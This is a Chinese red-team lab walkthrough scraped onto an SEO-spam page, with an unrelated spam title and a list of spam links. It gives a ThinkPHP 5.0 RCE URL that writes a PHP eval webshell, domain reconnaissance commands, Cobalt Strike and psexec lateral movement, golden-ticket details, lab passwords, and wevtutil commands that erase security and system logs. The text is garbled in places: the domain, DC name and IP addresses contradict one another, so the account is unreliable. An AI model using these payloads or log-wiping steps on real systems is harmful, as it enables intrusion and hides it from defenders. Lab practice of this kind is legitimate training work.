当前位置: 首页 > news >正文

手游托在什么网站申请深圳网站seo哪家快

手游托在什么网站申请,深圳网站seo哪家快,大连建设工程集团有限公司,网站 域名解析出错环境搭建 靶场虚拟机共用两个#xff0c;一个外网一个内网#xff0c;用来练习红队相关内容和方向#xff0c;主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习。 虚拟机密码 win7 sun\heart 123.com sun\Administrator dc123.com # …环境搭建 靶场虚拟机共用两个一个外网一个内网用来练习红队相关内容和方向主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习。 虚拟机密码 win7 sun\heart 123.com sun\Administrator dc123.com # win7 web需要打开C盘里的phpstudy最好关一下防火墙 2008 sun\admin 2020.com 密码修改位Xiaodi.com Win7双网卡模拟内外网 VMnet2网卡192.168.25.0/24 外网 VMnet10网卡192.168.26.0/24 内网 设置网卡 设置win2008网络 设置win7网络 查看网段 Windows 2028 关闭防火墙 打开phpstudy设置访问网页 外网渗透 端口扫描 我们使用nmap进行扫描win7: nmap -T4 -sC -sV 192.168.16.134 发现Web服务和Mysql Getshell .我们访问80端口发现是一个thinkphp 版本是ThinkPHP V5.0既然是V5.0那么我们就可以尝试一下Thinkphp远程命令执行漏洞 漏洞描述由于thinkphp对框架中的核心Requests类的method方法提供了表单请求伪造该功能利用 $_POST[_method] 来传递真实的请求方法。但由于框架没有对参数进行验证导致攻击者可以设置 $_POST[_method]__construct 而让该类的变量被覆盖。攻击者利用该方式将filter变量覆盖为system等函数名当内部进行参数过滤时便会进行执行任意命令 使用kali的searchsploit查找一下漏洞利用POC searchsploit thinkphp )发现最后一个是thinkphp5.X版本的RCE我们进入该漏洞的文件46150.txt cd /usr/share/exploitdb/exploits/php/webapps cat 46150.txt 写入webshell http://192.168.16.134/index.php?s/index/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]file_put_contentsvars[1][]shell.phpvars[1][]%3C%3Fphp%20%40eval(%24_POST%5Bcmd%5D)%3B%3F%3E 攻入内网 域信息收集命令 net view                 # 查看局域网内其他主机名 net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net user                 # 查看本机用户列表 net user /domain         # 查看域用户 net localgroup administrators # 查看本地管理员组通常会有域用户 net view /domain         # 查看有几个域 net user 用户名 /domain   # 获取指定域用户的信息 net group /domain        # 查看域里面的工作组查看把用户分了多少组只能在域控上操作 net group 组名 /domain    # 查看域中某工作组 net group domain admins /domain  # 查看域管理员的名字 net group domain computers /domain  # 查看域中的其他主机名 net group doamin controllers /domain  # 查看域控制器主机名可能有多台 上线cs 利用插件漏洞ms14-058进行权限提升 先判断是否存在域使用 ipconfig /all 查看 DNS 服务器发现主 DNS 后缀不为空存在域sum.com如下图所示 者也可以执行命令net config Workstation 来查看当前计算机名、全名、用户名、系统版本、工作站、域、登录域等全面的信息 上面发现 DNS 服务器名为 sum.org当前登录域为 GOD那接下来可执行net view /domain查看有几个域域环境可能存在多个域 既然只有一个域那就利用 net group domain controllers /domain 命令查看域控制器主机名直接确认域控主机的名称为 DC 已经确认域控主机的名称为 OWA继续执行命名net view查看查看局域网内其他主机信息主机名称、IP地址可得知域控主机的 IP 为 192.168.52.138如下图所示 局域网扫描出来除了域控主机之外还有另一台主机名称为ROOT-TVI862UBEH最后再确认一下该主机是否也是存在域中故执行命令net group domain computers /domain 查看 查看域管理员 net group domain admins /domain 查看目标列表 新建smb监听器 横向移动 Psexec横向移动 成功上线 看到连接图 权限维持 黄金票据 搜集到用户Administrator域sun.com SIDS-1-5-21-3388020223-1982701712-4030140183-500 HashAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 注入成功了 清理日志 使用wevtutil进行清除 ps:记住清除痕迹非常重要某些环境下不清除容易被gangang shell wevtutil cl security //清理安全日志 shell wevtutil cl system //清理系统日志 shell wevtutil cl application //清理应用程序日志 shell wevtutil cl windows powershell //清除power shell日志 shell wevtutil cl Setup  //清除cl事件日志中的 Setup 事件。
http://www.dnsts.com.cn/news/151270.html

相关文章:

  • 网站建设优化服务公司系统开发费
  • 东莞产品网站建设宁波网站优化方案
  • 永州网站建设企业嵌入式和网站开发
  • 无锡华士镇网站建设白银市网站建设
  • 建站公司 商城工程合同范本通用版
  • liferay做网站好吗企业网站建设排名官网
  • 中国住房和城乡建设部网站安全wordpress公众号推送
  • 重庆设计网站濮阳网络科技有限公司
  • 网站开发培训哪里好wordpress文章添加媒体
  • 网站建立数据库连接时出错深圳模板网站建设设计公司
  • 自己做的网站怎么用qq登入高校网站建设资料库
  • c苏宁网站开发北京海淀区网站开发
  • 基层建设被哪些网站全文收录南通seo网站优化软件
  • 网站建设有什么出路台州最新消息今天最新动态
  • 电商网站的意义网站admin密码忘记了怎么办
  • 网站开发项目报价单西安房地产网站建设
  • 网站中文通用网址域名怎么注册网址免费
  • 怎么实现网站建设报价方案哪个网站可以领单做效果图
  • 上海外贸网站推广公司山西手动网站建设推荐平台
  • 做网站的哪里有创建app需要什么条件
  • 企业电子商城网站建设软件自学网官方网站
  • 年轻人必备的十大网站wordpress旺季密码
  • 佛山网站优化有哪些北京市工程建设信息交易网站
  • 技术支持 长沙网站建设-创研科技外贸网站建设公司
  • 手机网站建立教程wordpress使用html界面
  • 中小企业为什么要建网站在线答题网站怎么做
  • 做网站的关键词是指中文网站建设小组
  • 遵义外国网站制作海南省建设考试网站
  • 11号在线 网站开发如何建立自己的网站步骤
  • 私人网站免费观看网站建设栏目流程